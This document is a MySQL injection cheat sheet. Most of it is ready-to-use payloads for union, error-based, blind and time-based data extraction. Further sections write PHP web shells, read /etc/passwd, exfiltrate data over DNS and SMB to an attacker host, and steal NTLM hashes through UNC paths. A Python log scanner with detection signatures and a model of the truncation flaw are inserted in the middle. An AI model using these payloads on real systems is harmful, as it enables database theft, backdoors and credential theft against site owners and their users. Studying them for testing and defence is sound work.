MYSQL Injection

Summary

MYSQL comment

```sql
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ -- version-specific comment: executed only if the MySQL version is 3.23.02 or later
```

MYSQL Union Based

Extract database with information_schema

First you need to know the number of columns in the original query; ORDER BY can be used to find it, since the query fails as soon as the index exceeds the column count.

```sql
order by 1
order by 2
order by 3
...
order by XXX
```

Then the following queries extract the database names, table names and column names.

```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```

Extract columns name without information_schema

Method for MySQL >= 4.1.

First find the number of columns from the error message:

```sql
?id=(1)and(SELECT * from db.users)=(1)
-- Operand should contain 4 column(s)
```

Then extract the column names, again from the error message:

```sql
?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)
-- Column 'id' cannot be null
```

Method for MySQL 5

```sql
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-- #1060 - Duplicate column name 'id'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
-- #1060 - Duplicate column name 'name'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
...
```

Extract data without columns name

Extracting data from the 4th column without knowing its name.

```sql
select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
```

Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`:

```sql
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title                                                           |
+-----------+-----------------------------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
+-----------+-----------------------------------------------------------------+
```

MYSQL Error Based

MYSQL Error Based - Basic

Works with MySQL >= 4.1

```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```

MYSQL Error Based - UpdateXML function

```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
```

A shorter form of the same technique:

```sql
' and updatexml(null,concat(0x0a,version()),null)-- -
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```

MYSQL Error Based - Extractvalue function

Works with MySQL >= 5.1

```sql
?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```

MYSQL Blind

MYSQL Blind with substring equivalent

```sql
?id=1 and substring(version(),1,1)=5
?id=1 and right(left(version(),1),1)=5
?id=1 and left(version(),1)=4
?id=1 and ascii(lower(substr(Version(),1,1)))=51
?id=1 and (select mid(version(),1,1)=4)
?id=1 AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) > 'A'
?id=1 AND (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns LIMIT 1) > 'A'
```

MYSQL Blind using a conditional statement

TRUE: if @@version starts with a 5:

```sql
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
Response:
HTTP/1.1 500 Internal Server Error
```

FALSE: if @@version starts with a 4:

```sql
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
Response:
HTTP/1.1 200 OK
```

MYSQL Blind with MAKE_SET

`YOLO` and `POS` are placeholders: the value being compared against and the character position being tested.

```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```

MYSQL Blind with LIKE

In a LIKE pattern `_` matches any single character, like `.` in a regex; use it to speed up blind testing.

```sql
SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
```

MYSQL Time Based

The following SQL snippets delay the response from MySQL.

```sql
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
```

Using SLEEP in a subselect

```sql
1 and (select sleep(10) from dual where database() like '%')#
1 and (select sleep(10) from dual where database() like '___')#
1 and (select sleep(10) from dual where database() like '____')#
1 and (select sleep(10) from dual where database() like '_____')#
1 and (select sleep(10) from dual where database() like 'a____')#
...
1 and (select sleep(10) from dual where database() like 's____')#
1 and (select sleep(10) from dual where database() like 'sa___')#
...
1 and (select sleep(10) from dual where database() like 'sw___')#
1 and (select sleep(10) from dual where database() like 'swa__')#
1 and (select sleep(10) from dual where database() like 'swb__')#
1 and (select sleep(10) from dual where database() like 'swi__')#
...
1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#
```

Using conditional statements

```sql
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,BENCHMARK(2000000,MD5(NOW()))) --
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3)) --
?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
```
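A defender-side check for the payload families in the union, error-based, blind and time-based sections above (plus the file-access and UNC forms further down this page), as an added example that is not part of the original page: it URL-decodes the request target from web-server log lines and matches it against signatures derived from those payloads. The log lines are constructed samples; `SIGNATURES`, `classify` and `scan` are names chosen here.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload families on this page: union/information_schema
# enumeration, error-based updatexml/extractvalue, time-based sleep/benchmark,
# file read/write, and UNC out-of-band paths (plain or hex-encoded 0x5c5c5c5c).
# Matching runs on the URL-decoded, lower-cased target, so case games such as
# "UniOn SeLeCt" and %2B/%20 encoding do not evade it.
SIGNATURES = {
    "union_information_schema": re.compile(r"union\s+(?:all\s+)?select|information_schema\."),
    "error_based_xml": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "file_access": re.compile(r"\bload_file\s*\(|into\s+(?:out|dump)file\b"),
    "unc_path": re.compile(r"\\{2}[\w.-]+\\+|0x5c5c5c5c"),
}

# Request target ("/path?query") taken from a combined-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify(target):
    """Return the sorted list of payload families found in one request target."""
    decoded = unquote_plus(target).lower()
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan(log_lines):
    """Return [(line_number, families)] for lines that hit at least one signature."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            families = classify(match.group(1))
            if families:
                hits.append((number, families))
    return hits


# Constructed sample log (not real traffic); the injected values are payloads from this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /post?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /post?id=1%20AND%20extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- HTTP/1.1" 500 230',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /post?id=-1%20UniOn%20Select%201,2,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /post?id=1%20and%20(select%20sleep(10)%20from%20dual%20where%20database()%20like%20%27sw%25%27)%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /post?id=1%27%20UNION%20ALL%20SELECT%20LOAD_FILE(%27%2Fetc%2Fpasswd%27)%20-- HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, families in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(families)}")
```

Pair the signature hits with the response status and timing: a 500 on a request carrying `extractvalue` is the error-based leak succeeding, and a multi-second response on a `sleep` request confirms the time-based condition was true.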

MYSQL DIOS - Dump in One Shot

```sql
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
```

MYSQL Current queries

The `INFORMATION_SCHEMA.PROCESSLIST` table lists the statements the server is executing at the moment.

```sql
union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
-- Dump in one shot example for the table content.
union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 #
```

MYSQL Read content of a file

Requires the FILE privilege, and the path must be allowed by the server's `secure_file_priv` setting; when that setting blocks it, the server answers with the error: `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`

```sql
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```

If you are root on the database, you can grant the FILE privilege again with the following query (note that `secure_file_priv` is a server startup setting, so GRANT does not change it):

```sql
GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
```

MYSQL Write a shell

```sql
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
```

MYSQL Truncation

In MySQL, "admin" and "admin " (with trailing spaces) compare as equal, because comparisons on non-binary strings ignore trailing spaces. If the username column has a character limit, the characters beyond it are silently truncated (unless strict SQL mode rejects the insert): with a 20-character column and a 21-character input, the last character is removed.

```sql
`username` varchar(20) not null
```

Payload: `username = "admin a"`, where the single space stands for enough spaces to push the trailing "a" past the 20-character limit, so the stored value truncates to "admin" followed by spaces and matches the existing account.
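The two MySQL behaviours that combine in this truncation issue, modelled in Python as an added illustration (not code from the original page): comparison under a PAD SPACE, case-insensitive collation ignores trailing spaces, and a non-strict `sql_mode` silently truncates over-length inserts. `store_username`, `mysql_equal`, `register` and `demo` are names chosen here, and the 20-character limit follows the column definition above.

```python
COLUMN_LIMIT = 20  # matches `username` varchar(20) from the text


def store_username(value, strict_mode):
    """Model an INSERT into the varchar(20) column: strict mode rejects
    over-length values (MySQL's 'Data too long' error), non-strict mode
    silently truncates them to the column width."""
    if len(value) > COLUMN_LIMIT:
        if strict_mode:
            raise ValueError("Data too long for column 'username'")
        return value[:COLUMN_LIMIT]
    return value


def mysql_equal(a, b):
    """Model '=' on non-binary strings under a PAD SPACE _ci collation:
    trailing spaces are ignored and case is folded, so 'admin' = 'admin   '."""
    return a.rstrip(" ").lower() == b.rstrip(" ").lower()


def register(users, username, strict_mode=False):
    """Model a registration routine that checks uniqueness with '=' and
    then inserts. Returns the stored value, or None if the name is taken."""
    if any(mysql_equal(existing, username) for existing in users):
        return None
    stored = store_username(username, strict_mode)
    users.append(stored)
    return stored


def demo(strict_mode):
    """Replay the page's scenario against a table that already holds 'admin'."""
    users = ["admin"]
    # Constructed payload: "admin", spaces up to the column width, then "a" (21 chars).
    payload = "admin" + " " * (COLUMN_LIMIT - len("admin")) + "a"
    try:
        stored = register(users, payload, strict_mode)
    except ValueError:
        return "rejected"      # strict mode: the insert fails outright
    if stored is not None and mysql_equal(stored, "admin"):
        return "collides"      # truncated row now compares equal to 'admin'
    return "distinct"


if __name__ == "__main__":
    print("non-strict:", demo(strict_mode=False))
    print("strict:", demo(strict_mode=True))
```

Enabling STRICT_TRANS_TABLES in `sql_mode` is the server-side fix; an application-side length check and a unique index on the column close the remaining gap.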

MYSQL UDF command execution

First check whether the UDF library is present on the server:

```bash
$ whereis lib_mysqludf_sys.so
/usr/lib/lib_mysqludf_sys.so
```

Then you can use functions such as sys_exec and sys_eval.

```bash
$ mysql -u root -p mysql
Enter password: [...]
mysql> SELECT sys_eval('id');
+-------------------------------------------------+
| sys_eval('id')                                  |
+-------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+-------------------------------------------------+
```

MYSQL Out of band

```sql
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt';
```

DNS exfiltration

```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
```

UNC Path - NTLM hash stealing

```sql
select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;
```
